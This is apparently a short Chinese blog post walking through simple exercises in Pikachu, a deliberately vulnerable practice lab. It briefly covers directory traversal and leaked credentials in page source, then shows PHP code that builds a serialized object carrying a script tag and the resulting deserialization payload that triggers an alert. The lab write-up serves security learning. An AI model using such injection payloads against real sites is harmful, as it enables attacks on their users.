Pikachu-一些简单的题

目录遍历漏洞

这题直接查找你想要的核心文件,比较简单

敏感信息泄露

查看网页源代码发现有账号和密码,直接登录

PHP反序列化

根据概述提示得知

class S{
        public $test="pikachu";
}

那么我们开始构建序列化

    class S{
        public $test="<script>alert(11111)</script>";
    }
    
    $t = new S;
    echo serialize($t);

得到payload

O:1:"S":1:{s:4:"test";s:29:"<script>alert(11111)</script>";}

posted @ 2022-11-15 10:05  诗酒于人  阅读(19)  评论(0)    收藏  举报